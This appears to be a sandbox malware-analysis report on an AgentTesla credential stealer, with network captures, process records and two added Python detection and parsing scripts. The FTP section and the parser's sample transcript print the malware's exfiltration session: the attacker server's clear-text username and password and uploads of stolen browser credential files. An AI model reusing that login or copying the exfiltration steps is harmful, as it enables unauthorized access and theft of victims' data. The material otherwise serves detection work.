Oct 3, 2024 14:29:22.343765020 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:22.508548975 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:22.513921976 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:22.525785923 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:22.679711103 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
                                                        Oct 3, 2024 14:29:22.680447102 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.687129974 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.836561918 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.836925983 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.841939926 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.991561890 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.992522955 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.997451067 CEST3184162919192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.997569084 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.997648001 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.004482031 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.480211020 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.480535984 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.480567932 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.485693932 CEST3184162919192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.485830069 CEST3184162919192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.485888004 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.526951075 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.636200905 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.637932062 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.643260002 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.794596910 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.795166969 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.800055981 CEST4552262920192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.800158978 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.800286055 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.805259943 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.284827948 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.286446095 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.291990042 CEST4552262920192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.292165995 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.339589119 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.441698074 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.444889069 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.449747086 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.599354982 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.602680922 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.608620882 CEST4896962921192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.609759092 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.609854937 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.615482092 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.088445902 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.095057011 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:25.100382090 CEST4896962921192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.100446939 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:25.136424065 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:25.250185966 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.292550087 CEST6291821192.168.2.11192.254.225.136
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 14:28:55.237112999 CEST | 53 | 57949 | 162.159.36.2 | 192.168.2.11
Oct 3, 2024 14:28:55.718930960 CEST | 53 | 58969 | 1.1.1.1 | 192.168.2.11
Oct 3, 2024 14:29:19.028096914 CEST | 59218 | 53 | 192.168.2.11 | 1.1.1.1
Oct 3, 2024 14:29:19.035286903 CEST | 53 | 59218 | 1.1.1.1 | 192.168.2.11
Oct 3, 2024 14:29:20.549104929 CEST | 52556 | 53 | 192.168.2.11 | 1.1.1.1
Oct 3, 2024 14:29:21.061662912 CEST | 53 | 52556 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 14:29:19.028096914 CEST | 192.168.2.11 | 1.1.1.1 | 0xefa6 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Oct 3, 2024 14:29:20.549104929 CEST | 192.168.2.11 | 1.1.1.1 | 0xab46 | Standard query (0) | ftp.ercolina-usa.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 14:29:19.035286903 CEST | 1.1.1.1 | 192.168.2.11 | 0xefa6 | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 14:29:19.035286903 CEST | 1.1.1.1 | 192.168.2.11 | 0xefa6 | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 14:29:19.035286903 CEST | 1.1.1.1 | 192.168.2.11 | 0xefa6 | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 14:29:21.061662912 CEST | 1.1.1.1 | 192.168.2.11 | 0xab46 | No error (0) | ftp.ercolina-usa.com | ercolina-usa.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 14:29:21.061662912 CEST | 1.1.1.1 | 192.168.2.11 | 0xab46 | No error (0) | ercolina-usa.com | - | 192.254.225.136 | A (IP address) | IN (0x0001) | false
• api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 62916 | 104.26.12.205 | 443 | 8124 | C:\Users\user\Desktop\QUOTATIONS#08670.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 12:29:19 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-10-03 12:29:19 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 12:29:19 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8cccefe61caa43b8-EWR
2024-10-03 12:29:19 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: 8.46.123.33
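The session above is the external-IP lookup AgentTesla is known to make before it reports in: a bare GET to api.ipify.org that announces itself as Firefox 99 but is sent by QUOTATIONS#08670.exe (PID 8124 in the session table), and the 11-byte body is the sandbox's public address. The block below is an added example for this report, not code from Joe Sandbox or from the sample, and runs a hunt for exactly that combination over proxy-style HTTP records. The record layout, the two benign comparison records, the browser image names and the IP-lookup hosts other than api.ipify.org are constructed assumptions for the example.

```python
"""Hunt over HTTP records for the external-IP check seen in this report: a
browser User-Agent sent by a process that is not that browser, to a public-IP
lookup service. Added example for this report, not Joe Sandbox code."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Public-IP lookup services. api.ipify.org is the one in this report; the
# others are assumed additions a hunter would normally include.
IP_LOOKUP_HOSTS = {
    "api.ipify.org", "ipify.org", "checkip.dyndns.org", "icanhazip.com", "ifconfig.me",
}

# Image basename -> browser family that image may legitimately claim in its UA.
BROWSER_IMAGES = {
    "firefox.exe": "Firefox",
    "chrome.exe": "Chrome",
    "msedge.exe": "Edge",
}


@dataclass(frozen=True)
class HttpRecord:
    pid: int
    image: str        # full path of the sending process
    dst_host: str
    dst_port: int
    user_agent: str


def ua_family(user_agent: str) -> str | None:
    """Browser family a User-Agent claims; None for non-browser UAs."""
    if "Firefox/" in user_agent:
        return "Firefox"
    if "Edg/" in user_agent:      # Edge UAs also contain "Chrome/", test first
        return "Edge"
    if "Chrome/" in user_agent:
        return "Chrome"
    return None


def image_family(image_path: str) -> str | None:
    """Browser family of the sending image, by basename; None if not a browser."""
    return BROWSER_IMAGES.get(re.split(r"[\\/]", image_path)[-1].lower())


def findings(record: HttpRecord) -> list[str]:
    """Reasons a record looks like a stealer's IP check; empty means clean."""
    reasons = []
    claimed, actual = ua_family(record.user_agent), image_family(record.image)
    if claimed is not None and actual != claimed:
        reasons.append(f"UA claims {claimed} but image is {record.image}")
    if actual is None and record.dst_host.lower() in IP_LOOKUP_HOSTS:
        reasons.append(f"non-browser process contacted IP-lookup host {record.dst_host}")
    return reasons


def hunt(records: list[HttpRecord]) -> dict[int, list[str]]:
    """PID -> reasons, for every record with at least one finding."""
    out: dict[int, list[str]] = {}
    for rec in records:
        if hits := findings(rec):
            out.setdefault(rec.pid, []).extend(hits)
    return out


FIREFOX_99_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"

# Constructed sample log. The first record mirrors the report's HTTPS session
# (PID 8124 from the session table); the other two are benign filler.
SAMPLE_LOG = [
    HttpRecord(8124, r"C:\Users\user\Desktop\QUOTATIONS#08670.exe", "api.ipify.org", 443, FIREFOX_99_UA),
    HttpRecord(4480, r"C:\Program Files\Mozilla Firefox\firefox.exe", "api.ipify.org", 443, FIREFOX_99_UA),
    HttpRecord(5120, r"C:\Windows\System32\curl.exe", "example.com", 443, "curl/8.4.0"),
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_LOG).items():
        print(pid, *reasons, sep="\n  ")
```

The two checks are deliberately independent: a browser User-Agent from a non-browser image is worth a look wherever the request goes, and a non-browser image asking an IP-lookup service for its address is worth a look whatever User-Agent it sends. The report's session trips both; the real Firefox record trips neither.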


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 3, 2024 14:29:21.717237949 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 11 of 150 allowed.
220-Local time is now 07:29. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Oct 3, 2024 14:29:21.717547894 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | USER me@ercolina-usa.com
Oct 3, 2024 14:29:22.051707983 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 331 User me@ercolina-usa.com OK. Password required
Oct 3, 2024 14:29:22.055375099 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | PASS uy,o#mZj8$lY
Oct 3, 2024 14:29:22.325660944 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 230 OK. Current restricted directory is /
Oct 3, 2024 14:29:22.508548975 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 504 Unknown command
Oct 3, 2024 14:29:22.513921976 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | PWD
Oct 3, 2024 14:29:22.679711103 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 257 "/" is your current location
Oct 3, 2024 14:29:22.680447102 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | TYPE I
Oct 3, 2024 14:29:22.836561918 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 200 TYPE is now 8-bit binary
Oct 3, 2024 14:29:22.836925983 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | PASV
Oct 3, 2024 14:29:22.991561890 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 227 Entering Passive Mode (192,254,225,136,124,97)
Oct 3, 2024 14:29:22.997648001 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | STOR CO_Chrome_Default.txt_user-179605_2024_10_03_09_19_18.txt
Oct 3, 2024 14:29:23.480211020 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 150 Accepted data connection
Oct 3, 2024 14:29:23.636200905 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 226-File successfully transferred
226 0.156 seconds (measured here), 1.81 Kbytes per second
Oct 3, 2024 14:29:23.637932062 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | PASV
Oct 3, 2024 14:29:23.794596910 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 227 Entering Passive Mode (192,254,225,136,177,210)
Oct 3, 2024 14:29:23.800286055 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | STOR CO_Edge Chromium_Default.txt_user-179605_2024_10_03_12_48_42.txt
Oct 3, 2024 14:29:24.284827948 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 150 Accepted data connection
Oct 3, 2024 14:29:24.441698074 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 226 File successfully transferred
Oct 3, 2024 14:29:24.444889069 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | PASV
Oct 3, 2024 14:29:24.599354982 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 227 Entering Passive Mode (192,254,225,136,191,73)
Oct 3, 2024 14:29:24.609854937 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136 | STOR CO_Firefox_bhsw2cld.default-release.txt_user-179605_2024_10_03_13_58_18.txt
Oct 3, 2024 14:29:25.088445902 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 150 Accepted data connection
Oct 3, 2024 14:29:25.250185966 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11 | 226 File successfully transferred
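The control channel above is a complete credential-exfiltration round trip over plain FTP: the login crosses the wire in clear text, each 227 reply's (p1,p2) pair decodes to a server data port (124*256+97 = 31841, 177*256+210 = 45522, 191*256+73 = 48969, which are the three short TCP conversations in the packet list), and the three STOR uploads are named after the browser and profile the data was taken from. The 504 reply has no matching client command in the report, so whatever triggered it is not shown. The block below is an added example for this report, not Joe Sandbox code, that parses such a transcript and recovers those facts; the 'C:'/'S:' transcript layout is constructed from the table above, and the upload-name pattern is taken from the three names in it.

```python
"""Parse an FTP control-channel transcript into the facts an analyst needs:
the clear-text login, the PASV data endpoint each upload used, and each STOR
upload with its outcome. Added example for this report, not Joe Sandbox code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed from the report's FTP table: timestamps, ports, the 150 replies
# and most of the banner dropped; 'C:' is the client, 'S:' the server.
FTP_TRANSCRIPT = """\
S: 220 You will be disconnected after 15 minutes of inactivity.
C: USER me@ercolina-usa.com
S: 331 User me@ercolina-usa.com OK. Password required
C: PASS uy,o#mZj8$lY
S: 230 OK. Current restricted directory is /
C: TYPE I
S: 200 TYPE is now 8-bit binary
C: PASV
S: 227 Entering Passive Mode (192,254,225,136,124,97)
C: STOR CO_Chrome_Default.txt_user-179605_2024_10_03_09_19_18.txt
S: 226 File successfully transferred
C: PASV
S: 227 Entering Passive Mode (192,254,225,136,177,210)
C: STOR CO_Edge Chromium_Default.txt_user-179605_2024_10_03_12_48_42.txt
S: 226 File successfully transferred
C: PASV
S: 227 Entering Passive Mode (192,254,225,136,191,73)
C: STOR CO_Firefox_bhsw2cld.default-release.txt_user-179605_2024_10_03_13_58_18.txt
S: 226 File successfully transferred
"""

# RFC 959 227 reply carries (h1,h2,h3,h4,p1,p2): host h1.h2.h3.h4, port p1*256+p2.
PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

# Upload-name layout observed in the table:
#   <kind>_<browser>_<profile>.txt_<victim>_<YYYY_MM_DD_hh_mm_ss>.txt
UPLOAD_RE = re.compile(
    r"^(?P<kind>[A-Z]+)_(?P<browser>.+?)_(?P<profile>.+?)\.txt_"
    r"(?P<victim>.+?)_(?P<stamp>\d{4}(?:_\d{2}){5})\.txt$"
)

@dataclass
class Upload:
    name: str
    data_endpoint: tuple[str, int] | None   # PASV endpoint the STOR followed
    completed: bool = False                 # set by the server's 226

@dataclass
class FtpSession:
    user: str | None = None
    password: str | None = None
    logged_in: bool = False
    uploads: list[Upload] = field(default_factory=list)

def pasv_endpoint(reply: str) -> tuple[str, int] | None:
    """Decode a 227 reply into (host, port); None if it carries no tuple."""
    m = PASV_RE.search(reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = map(int, m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2

def decode_upload_name(name: str) -> dict[str, str] | None:
    """Split an upload name into kind/browser/profile/victim/stamp fields."""
    m = UPLOAD_RE.match(name)
    return m.groupdict() if m else None

def parse_transcript(text: str) -> FtpSession:
    """Walk the transcript; each STOR takes the most recent PASV endpoint."""
    sess, pending = FtpSession(), None
    for line in text.splitlines():
        side, _, msg = line.partition(": ")
        verb, _, arg = msg.partition(" ")   # client: command and argument
        code = msg[:3]                      # server: three-digit reply code
        if side == "C" and verb == "USER":
            sess.user = arg
        elif side == "C" and verb == "PASS":
            sess.password = arg
        elif side == "C" and verb == "STOR":
            sess.uploads.append(Upload(arg, pending))
            pending = None                  # one data connection per transfer
        elif side == "S" and code == "230":
            sess.logged_in = True
        elif side == "S" and code == "227":
            pending = pasv_endpoint(msg)
        elif side == "S" and code == "226" and sess.uploads:
            sess.uploads[-1].completed = True
    return sess

def data_ports(sess: FtpSession) -> list[int]:
    """Server-side data ports to look for in the TCP packet list."""
    return [up.data_endpoint[1] for up in sess.uploads if up.data_endpoint]
```

Run stand-alone, parse_transcript(FTP_TRANSCRIPT) yields the login, three completed uploads and data ports [31841, 45522, 48969]; those ports are what to look for in the packet list to confirm each STOR actually moved data rather than being refused (here 62919/31841, 62920/45522 and 62921/48969 all carry traffic).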


Target ID: 0
Start time: 08:28:10
Start date: 03/10/2024
Path: C:\Users\user\Desktop\QUOTATIONS#08670.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\QUOTATIONS#08670.exe"
Imagebase: 0xc00000
File size: 1'330'176 bytes
MD5 hash: B88A9908634769557E2B6396F634C4AE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2008575393.0000000002691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 08:28:45
Start date: 03/10/2024
Path: C:\Users\user\Desktop\QUOTATIONS#08670.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\QUOTATIONS#08670.exe"
Imagebase: 0xc00000
File size: 1'330'176 bytes
MD5 hash: B88A9908634769557E2B6396F634C4AE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 8
Start time: 08:29:28
Start date: 03/10/2024
Path: C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase: 0x9b0000
File size: 1'330'176 bytes
MD5 hash: B88A9908634769557E2B6396F634C4AE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000008.00000002.2575551377.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 24%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 9
Start time: 08:29:36
Start date: 03/10/2024
Path: C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase: 0x9b0000
File size: 1'330'176 bytes
MD5 hash: B88A9908634769557E2B6396F634C4AE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000009.00000002.2575069317.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 10
Start time: 08:30:02
Start date: 03/10/2024
Path: C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):
Commandline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:
File size: 1'330'176 bytes
MD5 hash: B88A9908634769557E2B6396F634C4AE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 12
Start time: 08:30:09
Start date: 03/10/2024
Path: C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):
Commandline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:
File size: 1'330'176 bytes
MD5 hash: B88A9908634769557E2B6396F634C4AE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: false


                                                          Execution Graph

                                                          Execution Coverage:16.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:6.3%
                                                          Total number of Nodes:95
                                                          Total number of Limit Nodes:7
                                                          execution_graph 53639 792cf10 53640 792cf50 ResumeThread 53639->53640 53642 792cf81 53640->53642 53643 792b890 53644 792b8d5 Wow64GetThreadContext 53643->53644 53646 792b91d 53644->53646 53742 712acd0 53743 712ad16 DeleteFileW 53742->53743 53745 712ad4f 53743->53745 53746 792d450 53747 792d5db 53746->53747 53749 792d476 53746->53749 53749->53747 53750 7927900 53749->53750 53751 792d6d0 PostMessageW 53750->53751 53752 792d73c 53751->53752 53752->53749 53761 7920a70 53762 7920a83 53761->53762 53763 79226b1 VirtualProtect 53761->53763 53764 79226b8 VirtualProtect 53761->53764 53763->53762 53764->53762 53647 7922197 53651 79226b1 53647->53651 53654 79226b8 53647->53654 53648 79221a8 53652 7922700 VirtualProtect 53651->53652 53653 792273a 53652->53653 53653->53648 53655 7922700 VirtualProtect 53654->53655 53656 792273a 53655->53656 53656->53648 53753 792075b 53755 79226b1 VirtualProtect 53753->53755 53756 79226b8 VirtualProtect 53753->53756 53754 792076c 53755->53754 53756->53754 53657 792fd18 CloseHandle 53658 792fd7f 53657->53658 53722 792c2b8 53723 792c300 WriteProcessMemory 53722->53723 53725 792c357 53723->53725 53765 792bf78 53766 792bfb8 VirtualAllocEx 53765->53766 53768 792bff5 53766->53768 53663 85d01c 53664 85d034 53663->53664 53665 85d08e 53664->53665 53668 57e0c48 53664->53668 53674 57e0c39 53664->53674 53669 57e0c75 53668->53669 53670 57e0ca7 53669->53670 53680 57e0e9c 53669->53680 53686 57e0dc0 53669->53686 53691 57e0dd0 53669->53691 53675 57e0c75 53674->53675 53676 57e0ca7 53675->53676 53677 57e0e9c CallWindowProcW 53675->53677 53678 57e0dd0 CallWindowProcW 53675->53678 53679 57e0dc0 CallWindowProcW 53675->53679 53677->53676 53678->53676 53679->53676 53681 57e0e5a 53680->53681 53682 57e0eaa 53680->53682 53696 57e0e78 53681->53696 53700 57e0e88 53681->53700 53683 57e0e70 53683->53670 53687 57e0de4 53686->53687 53689 57e0e78 CallWindowProcW 53687->53689 53690 57e0e88 CallWindowProcW 53687->53690 
